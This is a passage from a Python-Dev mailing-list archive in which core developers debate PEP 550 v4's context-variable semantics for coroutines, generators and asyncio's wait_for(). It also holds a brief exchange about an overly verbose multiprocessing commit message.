This means that PEP 550 will have a caveat for async code: don't rely
on context propagation up the call stack, unless you are writing
__aenter__ and __aexit__ that are guaranteed to be called without
being wrapped into a Task.
"""

To ask the question again: can you showcase how and where the "caveat"
applies?

Regards

Antoine.
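A condensed sketch of the caveat being asked about, written in the
draft pseudo-code used throughout this thread (new_context_var() plus
asyncio's wait_for(); illustrative only, not runnable on any released
Python):

    var = new_context_var()

    async def set_var():
        var.set(42)

    async def direct_caller():
        # Plain await: set_var() runs in this coroutine's logical
        # context, so (with the v3-style semantics being restored)
        # the change is visible here.
        await set_var()
        assert var.get() == 42

    async def caller_with_timeout():
        # wait_for() implicitly wraps set_var() in a Task; the Task
        # gets its own logical context, so the change is isolated
        # and never reaches this coroutine -- this is the caveat.
        await wait_for(set_var(), 1)
        assert var.get() is None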
From yselivanov.ml at gmail.com  Tue Aug 29 15:59:19 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Tue, 29 Aug 2017 15:59:19 -0400
Subject: [Python-Dev] PEP 550 v4: coroutine policy
In-Reply-To:
References: <20170829204021.16934837@fsol>
Message-ID:

On Tue, Aug 29, 2017 at 3:32 PM, Antoine Pitrou wrote:
> To pose the question differently: why is example #1 supposed to be
> different, philosophically, than example #2?  Both spawn a coroutine,
> both wait for its execution to end.  There is no reason that adding a
> wait_for() intermediary (presumably because the user wants to add a
> timeout) would significantly change the execution semantics of bar().

I see your point.

The currently published version of the PEP (v4) fixes this by saying:
each coroutine has its own LC.  Therefore, "var.set(42)" cannot be
visible to the code that calls "bar()".  And therefore,
"await wait_for(bar())" and "await bar()" work the same way with
regards to execution context semantics.

*Unfortunately*, while this fixes the above examples to work the same
way, setting context vars in "__aenter__" stops working:

    class MyAsyncCM:

        def __aenter__(self):
            var.set(42)

    async with MyAsyncCM():
        assert var.get() == 42

Because __aenter__ has its own LC, the code wrapped in "async with"
will not see the effect of "var.set(42)"!

This absolutely needs to be fixed, and the only way (that I know) it
can be fixed is to revert the "every coroutine has its own LC"
statement (going back to the semantics coroutines had in PEP 550 v2
and v3).

> I don't understand why a non-obvious behaviour detail (the fact that
> wait_for() creates an asyncio.Task implicitly) should translate into a
> fundamental difference in observable behaviour.  I find it
> counter-intuitive and error-prone.

"await bar()" and "await wait_for(bar())" are actually quite different.
Let me illustrate with an example:

    b1 = bar()
    # bar() is not running yet
    await b1

    b2 = wait_for(bar())
    # bar() was wrapped into a Task and is running right now
    await b2

Usually this difference is subtle, but in asyncio it's perfectly fine
to never await on b2, just let it run until it completes.
If you don't "await b1" -- b1 simply will never run. All in all, we can't say that "await bar()" and "await wait_for(bar())" are equivalent. The former runs bar() synchronously within the coroutine that awaits it. The latter runs bar() in a completely separate and detached task in parallel to the coroutine that spawned it. > >> This is a slightly complicated case, but it's addressable with a good >> documentation and recommended best practices. > > It would be better addressed with consistent behaviour that doesn't rely > on specialist knowledge, though :-/ I agree. But I don't see any other solution that would solve the problem *and* satisfy the following requirements: 1. Context variables set in "CM.__aenter__" and "CM.__aexit__" should be visible to code that is wrapped in "async with CM()". 2. Tasks must have isolated contexts -- changes that coroutines do to the EC in one Task, should not be visible to other Tasks. Yury From njs at pobox.com Tue Aug 29 16:06:44 2017 From: njs at pobox.com (Nathaniel Smith) Date: Tue, 29 Aug 2017 13:06:44 -0700 Subject: [Python-Dev] PEP 550 v4: coroutine policy In-Reply-To: References: <20170829204021.16934837@fsol> Message-ID: On Tue, Aug 29, 2017 at 12:32 PM, Antoine Pitrou wrote: > > > Le 29/08/2017 ? 21:18, Yury Selivanov a ?crit : >> On Tue, Aug 29, 2017 at 2:40 PM, Antoine Pitrou wrote: >>> On Mon, 28 Aug 2017 17:24:29 -0400 >>> Yury Selivanov wrote: >>>> Long story short, I think we need to rollback our last decision to >>>> prohibit context propagation up the call stack in coroutines. In PEP >>>> 550 v3 and earlier, the following snippet would work just fine: >>>> >>>> var = new_context_var() >>>> >>>> async def bar(): >>>> var.set(42) >>>> >>>> async def foo(): >>>> await bar() >>>> assert var.get() == 42 # with previous PEP 550 semantics >>>> >>>> run_until_complete(foo()) >>>> >>>> But it would break if a user wrapped "await bar()" with "wait_for()": >>>> >>>> var = new_context_var() >>>> >>>> async def bar(): >>>> var.set(42) >>>> >>>> async def foo(): >>>> await wait_for(bar(), 1) >>>> assert var.get() == 42 # AssertionError !!! >>>> >>>> run_until_complete(foo()) >>>> >>> [...] >> >>> Why wouldn't the bar() coroutine inherit >>> the LC at the point it's instantiated (i.e. where the synchronous bar() >>> call is done)? >> >> We want tasks to have their own isolated contexts. When a task >> is started, it runs its code in parallel with its "parent" task. > > I'm sorry, but I don't understand what it all means. > > To pose the question differently: why is example #1 supposed to be > different, philosophically, than example #2? Both spawn a coroutine, > both wait for its execution to end. There is no reason that adding a > wait_for() intermediary (presumably because the user wants to add a > timeout) would significantly change the execution semantics of bar(). > >> wait_for() in the above example creates an asyncio.Task implicitly, >> and that's why we don't see 'var' changed to '42' in foo(). > > I don't understand why a non-obvious behaviour detail (the fact that > wait_for() creates an asyncio.Task implicitly) should translate into a > fundamental difference in observable behaviour. I find it > counter-intuitive and error-prone. 
For better or worse, asyncio users generally need to be aware of the
distinction between coroutines/Tasks/Futures and which functions create
or return which -- it's essentially the same as the distinction between
running some code in the current thread versus spawning a new thread to
run it (and then possibly waiting for the result).  Mostly the docs
tell you when a function converts a coroutine into a Task, e.g. if you
look at the docs for 'ensure_future' or 'wait_for' or 'wait' they all
say this explicitly.  Or in some cases like 'gather' and 'shield', it's
implicit, because they take arbitrary futures, and creating a task is
how you convert a coroutine into a future.  As a rule of thumb, I think
it's accurate to say that any function that takes a coroutine object as
an argument always converts it into a Task.

>> This is a slightly complicated case, but it's addressable with good
>> documentation and recommended best practices.
>
> It would be better addressed with consistent behaviour that doesn't
> rely on specialist knowledge, though :-/

This is the core of the Curio/Trio critique of asyncio: in asyncio,
operations that implicitly initiate concurrent execution are all over
the API.  This is the root cause of asyncio's problems with buffering
and backpressure, it makes it hard to shut down properly (it's hard to
know when everything has finished running), it's related to the "spooky
cancellation at a distance" issue where cancelling one task can cause
another Task to get a cancelled exception, etc.  If you use the
recommended "high level" API for streams, then AFAIK it's still
impossible to close your streams properly at shutdown (you can request
that a close happen "sometime soon", but you can't tell when it's
finished).

Obviously asyncio isn't going anywhere, so we should try to
solve/mitigate these issues where we can, but asyncio's API
fundamentally assumes that users will be very aware and careful about
which operations create which kinds of concurrency.  So I sort of feel
like, if you can use asyncio at all, then you can handle wait_for
creating a new LC.

-n

[1] https://vorpus.org/blog/some-thoughts-on-asynchronous-api-design-in-a-post-asyncawait-world/#bug-3-closing-time

-- 
Nathaniel J. Smith -- https://vorpus.org

From antoine at python.org  Tue Aug 29 16:10:01 2017
From: antoine at python.org (Antoine Pitrou)
Date: Tue, 29 Aug 2017 22:10:01 +0200
Subject: [Python-Dev] PEP 550 v4: coroutine policy
In-Reply-To:
References: <20170829204021.16934837@fsol>
Message-ID:

On 29/08/2017 at 21:59, Yury Selivanov wrote:
> This absolutely needs to be fixed, and the only way (that I know) it
> can be fixed is to revert the "every coroutine has its own LC"
> statement (going back to the semantics coroutines had in PEP 550 v2
> and v3).

I completely agree with this.  What I don't understand is why example
#2 can't work the same.

> "await bar()" and "await wait_for(bar())" are actually quite different.
> Let me illustrate with an example:
>
>     b1 = bar()
>     # bar() is not running yet
>     await b1
>
>     b2 = wait_for(bar())
>     # bar() was wrapped into a Task and is running right now
>     await b2
>
> Usually this difference is subtle, but in asyncio it's perfectly fine
> to never await on b2, just let it run until it completes.  If you
> don't "await b1" -- b1 simply will never run.

Perhaps... But still, why doesn't bar() inherit the LC *at the point
where it was instantiated* (i.e. foo()'s LC in the examples)?  The fact
that it's *later* passed to wait_for() shouldn't matter, right?  Or
should it?
Regards

Antoine.

From njs at pobox.com  Tue Aug 29 16:18:51 2017
From: njs at pobox.com (Nathaniel Smith)
Date: Tue, 29 Aug 2017 13:18:51 -0700
Subject: [Python-Dev] PEP 550 v4: coroutine policy
In-Reply-To:
References: <20170829204021.16934837@fsol>
Message-ID:

On Tue, Aug 29, 2017 at 12:59 PM, Yury Selivanov wrote:
>     b2 = wait_for(bar())
>     # bar() was wrapped into a Task and is running right now
>     await b2

Ah.... not quite.  wait_for is itself implemented as a coroutine, so it
doesn't spawn off bar() into its own task until you await b2.

Though according to the docs you should pretend that you don't know
whether wait_for returns a coroutine or a Future, so what you said
would also be a conforming implementation.

-n

-- 
Nathaniel J. Smith -- https://vorpus.org

From yselivanov.ml at gmail.com  Tue Aug 29 16:20:21 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Tue, 29 Aug 2017 16:20:21 -0400
Subject: [Python-Dev] PEP 550 v4: coroutine policy
In-Reply-To:
References: <20170829204021.16934837@fsol>
Message-ID:

On Tue, Aug 29, 2017 at 4:10 PM, Antoine Pitrou wrote:
[..]
> Perhaps... But still, why doesn't bar() inherit the LC *at the point
> where it was instantiated* (i.e. foo()'s LC in the examples)?  The fact
> that it's *later* passed to wait_for() shouldn't matter, right?  Or
> should it?

bar() will inherit the lookup chain.  Two examples:

1)

    gvar = new_context_var()
    var = new_context_var()

    async def bar():
        # EC = [current_thread_LC_copy, Task_foo_LC]
        var.set(42)
        assert gvar.get() == 'aaaa'

    async def foo():
        # EC = [current_thread_LC_copy, Task_foo_LC]
        gvar.set('aaaa')
        await bar()
        assert var.get() == 42   # with previous PEP 550 semantics
        assert gvar.get() == 'aaaa'

    # EC = [current_thread_LC]
    run_until_complete(foo())    # Task_foo

2)

    gvar = new_context_var()
    var = new_context_var()

    async def bar():
        # EC = [current_thread_LC_copy, Task_foo_LC_copy, Task_wait_for_LC]
        var.set(42)
        assert gvar.get() == 'aaaa'

    async def foo():
        # EC = [current_thread_LC_copy, Task_foo_LC]
        # bar() is wrapped into Task_wait_for implicitly
        await wait_for(bar(), 1)
        assert gvar.get() == 'aaaa'  # OK
        assert var.get() == 42       # AssertionError !!!

    # EC = [current_thread_LC]
    run_until_complete(foo())    # Task_foo

The key difference: in example (1), bar() will have the LC of the Task
that runs foo().  Both "foo()" and "bar()" will *share* the same LC.
That's why foo() will see changes made in bar().

In example (2), bar() will have the LC of the wait_for() task, and
foo() will have a different LC.

Yury
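The lookup-chain behaviour in these two examples can be modelled with
collections.ChainMap (echoing the ChainMap comparison at the top of
this digest) -- a runnable toy analogy only, with each Task pushing a
fresh child mapping and none of the PEP's copy-on-write machinery:

    from collections import ChainMap

    thread_lc = {}
    ec_thread = ChainMap(thread_lc)     # EC = [current_thread_LC]

    ec_foo = ec_thread.new_child({})    # EC = [..., Task_foo_LC]
    ec_foo['gvar'] = 'aaaa'             # writes go to the newest LC

    # Example (1): bar() shares Task_foo's chain, so its write is
    # visible to foo().
    ec_foo['var'] = 42
    assert ec_foo['var'] == 42

    # Example (2): wait_for() pushes Task_wait_for_LC; bar()'s write
    # lands in that map.  Reads still fall through the chain, but
    # nothing propagates back up.
    ec_wait_for = ec_foo.new_child({})  # EC = [..., Task_foo_LC, Task_wait_for_LC]
    ec_wait_for['var2'] = 42
    assert ec_wait_for['gvar'] == 'aaaa'  # lookup falls through the chain
    assert 'var2' not in ec_foo           # the write did not reach foo()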
From antoine at python.org  Tue Aug 29 16:33:00 2017
From: antoine at python.org (Antoine Pitrou)
Date: Tue, 29 Aug 2017 22:33:00 +0200
Subject: [Python-Dev] PEP 550 v4: coroutine policy
In-Reply-To:
References: <20170829204021.16934837@fsol>
Message-ID: <42d4fd90-680a-7ea4-1e83-af0cb938a0ee@python.org>

On 29/08/2017 at 22:20, Yury Selivanov wrote:
>
> 2)
>
>     gvar = new_context_var()
>     var = new_context_var()
>
>     async def bar():
>         # EC = [current_thread_LC_copy, Task_foo_LC_copy, Task_wait_for_LC]

Ah, thanks!... That explains things, though I don't expect most users
to spontaneously infer this and its consequences from the fact that
they used "wait_for()".

This seems actually even more problematic, because if bar() can mutate
Task_wait_for_LC, it may inadvertently affect wait_for() (assuming the
wait_for() implementation may some day use the EC for whatever purpose,
e.g. logging).

It seems framework code like wait_for() should have a way to override
the default behaviour and remove its own LCs from "child" coroutines'
lookup chains.  Perhaps the PEP already allows for this?

Regards

Antoine.

From yselivanov.ml at gmail.com  Tue Aug 29 16:54:54 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Tue, 29 Aug 2017 16:54:54 -0400
Subject: [Python-Dev] PEP 550 v4: coroutine policy
In-Reply-To: <42d4fd90-680a-7ea4-1e83-af0cb938a0ee@python.org>
References: <20170829204021.16934837@fsol> <42d4fd90-680a-7ea4-1e83-af0cb938a0ee@python.org>
Message-ID:

On Tue, Aug 29, 2017 at 4:33 PM, Antoine Pitrou wrote:
> Ah, thanks!... That explains things, though I don't expect most users
> to spontaneously infer this and its consequences from the fact that
> they used "wait_for()".

Yeah, we use "# EC=" comments in the PEP to explain how the EC is
implemented for generators (in the Detailed Specification section), and
will now do the same for coroutines (in the next update).

> This seems actually even more problematic, because if bar() can mutate
> Task_wait_for_LC, it may inadvertently affect wait_for() (assuming the
> wait_for() implementation may some day use the EC for whatever purpose,
> e.g. logging).

In general the pattern is to wrap the passed coroutine into a Task and
then attach some callbacks to it (or wrap the coroutine into another
coroutine).  So while I understand the concern, I can't immediately
come up with a realistic example...

> It seems framework code like wait_for() should have a way to override
> the default behaviour and remove its own LCs from "child" coroutines'
> lookup chains.  Perhaps the PEP already allows for this?

Yes, the PEP provides enough APIs to implement any semantics we want.
We might want to add an "execution_context" kwarg to
"asyncio.create_task" to make this customization of the EC easy for
Tasks.

Yury

From greg.ewing at canterbury.ac.nz  Tue Aug 29 17:45:08 2017
From: greg.ewing at canterbury.ac.nz (Greg Ewing)
Date: Wed, 30 Aug 2017 09:45:08 +1200
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz>
Message-ID: <59A5E064.3010101@canterbury.ac.nz>

Yury Selivanov wrote:
> Consider the following generator:
>
>     def gen():
>         with decimal.context(...):
>             yield
>
> We don't want gen's context to leak to the outer scope

That's understandable, but fixing that problem shouldn't come at the
expense of breaking the ability to refactor generator code or async
code without changing its semantics.

I'm not convinced that it has to, either.  In this example, the
with-statement is the thing that should be establishing a new nested
context.  Yielding and re-entering the generator should only be
swapping around between existing contexts.
> Now, let's consider a "broken" generator:
>
>     def gen():
>         decimal.context(...)
>         yield

The following non-generator code is "broken" in exactly the same way:

    def foo():
        decimal.context(...)
        do_some_decimal_calculations()
        # Context has now been changed for the caller

> I simply want consistency.

So do I!  We just have different ideas about what consistency means
here.

> It's easier for everybody to say that
> generators never leaked their context changes to the outer scope,
> rather than saying that "generators can sometimes leak their context".

No, generators should *always* leak their context changes to exactly
the same extent that normal functions do.  If you don't want to leak a
context change, you should use a with statement.

What you seem to be suggesting is that generators shouldn't leak
context changes even when you *don't* use a with-statement.  If you're
going to do that, you'd better make sure that the same thing applies to
regular functions, otherwise you've introduced an inconsistency.

-- 
Greg

From yselivanov.ml at gmail.com  Tue Aug 29 18:01:40 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Tue, 29 Aug 2017 18:01:40 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <59A5E064.3010101@canterbury.ac.nz>
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5E064.3010101@canterbury.ac.nz>
Message-ID:

On Tue, Aug 29, 2017 at 5:45 PM, Greg Ewing wrote:
[..]
> What you seem to be suggesting is that generators shouldn't
> leak context changes even when you *don't* use a with-statement.

Yes, generators shouldn't leak context changes, regardless of what
changes the context inside them and how:

    var = new_context_var()

    def gen():
        old_val = var.get()
        try:
            var.set('blah')
            yield
            yield
            yield
        finally:
            var.set(old_val)

Without PEP 550, iterating the above generator with "next(gen())" would
leak the state and corrupt the state of the caller -- and a "finally"
(or "with") block wouldn't help you here.  That's the problem the PEP
fixes.

The EC interaction with generators is explained in great detail here:

    https://www.python.org/dev/peps/pep-0550/#id4

We explain the motivation behind desiring a working context-local
solution for generators in the Rationale section:

    https://www.python.org/dev/peps/pep-0550/#rationale

Basically half of the PEP is about isolating context in generators.

> If you're going to do that, you'd better make sure that the
> same thing applies to regular functions, otherwise you've
> introduced an inconsistency.

Regular functions cannot pause/resume their execution, so they can't
leak an inconsistent context change due to out-of-order or partial
execution.

PEP 550 positions itself as a replacement for TLS, and clearly defines
its semantics for regular functions in a single thread, regular
functions in multithreaded code, generators, and asynchronous code
(async/await).  Everything is specified in the High-level Specification
section.  I wouldn't call slightly differently defined semantics for
generators/coroutines/functions an "inconsistency" -- they just have
different EC semantics, given how different they are from each other.

Drawing a parallel between 'yield from' and function calls is possible,
but we shouldn't forget that you can 'yield from' a half-iterated
generator.

Yury
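To see concretely why a try/finally cannot protect the caller of a
suspended generator, here is a small runnable illustration that uses a
plain module-level global in place of the draft context-variable API (a
simplification so it runs on current Python):

    state = 'outer'

    def gen():
        global state
        old = state
        try:
            state = 'inner'
            yield
            yield
        finally:
            state = old

    g = gen()
    next(g)                   # suspend gen after its first yield
    assert state == 'inner'   # the change has leaked to the caller
    g.close()                 # only closing (or exhausting) the generator
    assert state == 'outer'   # runs the finally block and restores it

Between the next(g) and the g.close(), any code the caller runs sees
the generator's "inner" state -- which is exactly the leak the PEP's
per-generator logical contexts are meant to prevent.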
From stefan at bytereef.org  Tue Aug 29 19:06:55 2017
From: stefan at bytereef.org (Stefan Krah)
Date: Wed, 30 Aug 2017 01:06:55 +0200
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References: <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5E064.3010101@canterbury.ac.nz>
Message-ID: <20170829230655.GA4933@bytereef.org>

On Tue, Aug 29, 2017 at 06:01:40PM -0400, Yury Selivanov wrote:
> PEP 550 positions itself as a replacement for TLS, and clearly defines
> its semantics for regular functions in a single thread, regular
> functions in multithreaded code, generators, and asynchronous code
> (async/await).  Everything is specified in the High-level Specification
> section.  I wouldn't call slightly differently defined semantics for
> generators/coroutines/functions an "inconsistency" -- they just have
> different EC semantics, given how different they are from each other.

What I don't find so consistent is that the async universe is guarded
with async {def, for, with, ...}, but in this proposal regular context
managers and context setters implicitly adapt their behavior.

So, pedantically, having a language extension like

    async set(var, value)
    x = async get(var)

and making async-safe context managers explicit

    async with decimal.localcontext():
        ...

would feel more consistent.  I know generators are a problem, but even
allowing something like "async set" in generators would be a step up.

Stefan Krah

From yselivanov.ml at gmail.com  Tue Aug 29 19:34:27 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Tue, 29 Aug 2017 19:34:27 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <20170829230655.GA4933@bytereef.org>
References: <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5E064.3010101@canterbury.ac.nz> <20170829230655.GA4933@bytereef.org>
Message-ID:

On Tue, Aug 29, 2017 at 7:06 PM, Stefan Krah wrote:
> What I don't find so consistent is that the async universe is guarded
> with async {def, for, with, ...}, but in this proposal regular context
> managers and context setters implicitly adapt their behavior.
>
> [...]
>
> would feel more consistent.  I know generators are a problem, but even
> allowing something like "async set" in generators would be a step up.

But regular context managers work just fine with asynchronous code, and
not all of them have local state.  For example, you could have a
context manager that times how long the code wrapped in it takes to
execute:

    async def foo():
        with timing():
            await ...
We use asynchronous context managers only when they need to do
asynchronous operations in their __aenter__ and __aexit__ (like DB
transaction begin/rollback/commit).

Requiring "await" to set a value for a context variable would force us
to write specialized async CMs for cases where a sync CM would do just
fine.  This, in turn, would make it impossible to use some sync
libraries in async code.  But there's nothing wrong with using
numpy/numpy.errstate in a coroutine.  I want to be able to copy/paste
their examples into my async code and I'd expect it to just work --
that's the point of the PEP.

async/await already requires libraries that involve IO to have separate
APIs.  Let's not make the situation worse by asking people to use an
asynchronous version of PEP 550 even though it's not really needed.

Yury

From greg.ewing at canterbury.ac.nz  Tue Aug 29 19:36:41 2017
From: greg.ewing at canterbury.ac.nz (Greg Ewing)
Date: Wed, 30 Aug 2017 11:36:41 +1200
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz>
Message-ID: <59A5FA89.1000001@canterbury.ac.nz>

Yury Selivanov wrote:
> While we want "yield from" to have semantics close to a function call,

That's not what I said!  I said that "yield from foo()" should have
semantics close to a function call.  If you separate the "yield from"
from the "foo()", then of course you can get different behaviours.

But that's beside the point, because I'm not suggesting that generators
should behave differently depending on when or if you use "yield from"
on them.

> For (1) we want the context change to be isolated.  For (2) you say
> that the context change should propagate to the caller.

No, I'm saying that the context change should *always* propagate to the
caller, unless you do something explicit within the generator to
prevent it.

I have some ideas on what that something might be, which I'll post
later.

-- 
Greg

From yselivanov.ml at gmail.com  Tue Aug 29 19:54:05 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Tue, 29 Aug 2017 19:54:05 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <59A5FA89.1000001@canterbury.ac.nz>
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz>
Message-ID:

On Tue, Aug 29, 2017 at 7:36 PM, Greg Ewing wrote:
> That's not what I said!  I said that "yield from foo()" should
> have semantics close to a function call.  If you separate the
> "yield from" from the "foo()", then of course you can get
> different behaviours.
>
> But that's beside the point, because I'm not suggesting
> that generators should behave differently depending on when
> or if you use "yield from" on them.

OK, that wasn't clear.
Yury

From yselivanov.ml at gmail.com  Tue Aug 29 20:18:53 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Tue, 29 Aug 2017 20:18:53 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <59A5FA89.1000001@canterbury.ac.nz>
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz>
Message-ID:

On Tue, Aug 29, 2017 at 7:36 PM, Greg Ewing wrote:
[..]
> No, I'm saying that the context change should *always*
> propagate to the caller, unless you do something explicit
> within the generator to prevent it.
>
> I have some ideas on what that something might be, which
> I'll post later.

BTW we already have mechanisms to always propagate context to the
caller -- just use threading.local() or a global variable.  PEP 550 is
for situations when you explicitly don't want to propagate the state.

Anyways, I'm curious to hear your ideas.

Yury

From storchaka at gmail.com  Wed Aug 30 01:48:56 2017
From: storchaka at gmail.com (Serhiy Storchaka)
Date: Wed, 30 Aug 2017 08:48:56 +0300
Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079)
In-Reply-To: <3xhkRl6v1MzFqct@mail.python.org>
References: <3xhkRl6v1MzFqct@mail.python.org>
Message-ID:

30.08.17 01:52, Antoine Pitrou wrote:
> https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c
> commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c
> branch: master
> author: Allen W. Smith, Ph.D
> committer: Antoine Pitrou
> date: 2017-08-30T00:52:18+02:00
> summary:
>
> bpo-5001: More-informative multiprocessing error messages (#3079)
>
> * Make error message more informative
>
> Replace assertions in error-reporting code with more-informative
> version that doesn't cause confusion over where and what the error is.
>
> * Additional clarification + get travis to check
>
> * Change from SystemError to TypeError
>
> As suggested in PR comment by @pitrou, changing from SystemError;
> TypeError appears appropriate.
>
> * NEWS file installation; ACKS addition (will do my best to justify it
> by additional work)
>
> * Making current AssertionErrors in multiprocessing more informative
>
> * Blurb added re multiprocessing managers.py, queues.py cleanup
>
> * Further multiprocessing cleanup - went through pool.py
>
> * Fix two asserts in multiprocessing/util.py
>
> * Most asserts in multiprocessing more informative
>
> * Didn't save right version
>
> * Further work on multiprocessing error messages
>
> * Correct typo
>
> * Correct typo v2
>
> * Blasted colon... serves me right for trying to work on two things at once
>
> * Simplify NEWS entry
>
> * Update 2017-08-18-17-16-38.bpo-5001.gwnthq.rst
>
> * Update 2017-08-18-17-16-38.bpo-5001.gwnthq.rst
>
> OK, never mind.
>
> * Corrected (thanks to pitrou) error messages for notify
>
> * Remove extraneous backslash in docstring.

Please, please don't forget to edit commit messages before merging.  An
excessively verbose commit message will be kept in the repository
forever and will harm future developers who read the history.
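For contrast, an edited squash-merge message for that change might have
looked something like this (an illustrative rewrite, not the message
actually recorded):

    bpo-5001: More-informative multiprocessing error messages (#3079)

    Replace assertions in multiprocessing's error-reporting and
    argument-checking code with informative TypeError/ValueError
    exceptions, so failures no longer surface as bare AssertionErrors.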
From ncoghlan at gmail.com  Wed Aug 30 02:40:23 2017
From: ncoghlan at gmail.com (Nick Coghlan)
Date: Wed, 30 Aug 2017 16:40:23 +1000
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz>
Message-ID:

On 30 August 2017 at 10:18, Yury Selivanov wrote:
> On Tue, Aug 29, 2017 at 7:36 PM, Greg Ewing wrote:
> [..]
>> No, I'm saying that the context change should *always*
>> propagate to the caller, unless you do something explicit
>> within the generator to prevent it.
>>
>> I have some ideas on what that something might be, which
>> I'll post later.
>
> BTW we already have mechanisms to always propagate context to the
> caller -- just use threading.local() or a global variable.  PEP 550 is
> for situations when you explicitly don't want to propagate the state.

Writing an "update_parent_context" decorator is also trivial (and will
work for both sync and async generators):

    def update_parent_context(gf):
        @functools.wraps(gf)
        def wrapper(*args, **kwds):
            gen = gf(*args, **kwds)
            gen.__logical_context__ = None
            return gen
        return wrapper

The PEP already covers that approach when it talks about the changes to
contextlib.contextmanager to get context changes to propagate
automatically.  With contextvars getting its own module, it would also
be straightforward to simply include that decorator as part of its API,
so folks won't need to write their own.

While I'm not sure how much practical use it will see, I do think it's
important to preserve the *ability* to transparently refactor
generators using yield from - I'm just OK with such a refactoring
becoming "yield from update_parent_context(subgen())" instead of the
current "yield from subgen()" (as I think *not* updating the parent
context is a better default than updating it).

Cheers,
Nick.

-- 
Nick Coghlan   |   ncoghlan at gmail.com   |   Brisbane, Australia

From ncoghlan at gmail.com  Wed Aug 30 02:47:07 2017
From: ncoghlan at gmail.com (Nick Coghlan)
Date: Wed, 30 Aug 2017 16:47:07 +1000
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz>
Message-ID:

On 30 August 2017 at 16:40, Nick Coghlan wrote:
> Writing an "update_parent_context" decorator is also trivial (and will
> work for both sync and async generators):
>
>     def update_parent_context(gf):
>         @functools.wraps(gf)
>         def wrapper(*args, **kwds):
>             gen = gf(*args, **kwds)
>             gen.__logical_context__ = None
>             return gen
>         return wrapper
[snip]
> While I'm not sure how much practical use it will see, I do think it's
> important to preserve the *ability* to transparently refactor
> generators using yield from - I'm just OK with such a refactoring
> becoming "yield from update_parent_context(subgen())" instead of the
> current "yield from subgen()" (as I think *not* updating the parent
> context is a better default than updating it).
One option would be to provide both: def update_parent_context(gen): ""Configures a generator-iterator to update its caller's context variables"""" gen.__logical_context__ = None return gen def updates_parent_context(gf): ""Wraps a generator function's instances with update_parent_context"""" @functools.wraps(gf): def wrapper(*args, **kwds): return update_parent_context(gf(*args, **kwds)) return wrapper Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From solipsis at pitrou.net Wed Aug 30 05:39:31 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 30 Aug 2017 11:39:31 +0200 Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079) References: <3xhkRl6v1MzFqct@mail.python.org> Message-ID: <20170830113931.6730f2c3@fsol> On Wed, 30 Aug 2017 08:48:56 +0300 Serhiy Storchaka wrote: > 30.08.17 01:52, Antoine Pitrou ????: > > https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > branch: master > > author: Allen W. Smith, Ph.D > > committer: Antoine Pitrou > > date: 2017-08-30T00:52:18+02:00 > > summary: > > > > bpo-5001: More-informative multiprocessing error messages (#3079) > > > > * Make error message more informative > > > > Replace assertions in error-reporting code with more-informative version that doesn't cause confusion over where and what the error is. > > > > * Additional clarification + get travis to check > > > > * Change from SystemError to TypeError > > > > As suggested in PR comment by @pitrou, changing from SystemError; TypeError appears appropriate. > > > > * NEWS file installation; ACKS addition (will do my best to justify it by additional work) > > > > * Making current AssertionErrors in multiprocessing more informative > > > > * Blurb added re multiprocessing managers.py, queues.py cleanup > > > > * Further multiprocessing cleanup - went through pool.py > > > > * Fix two asserts in 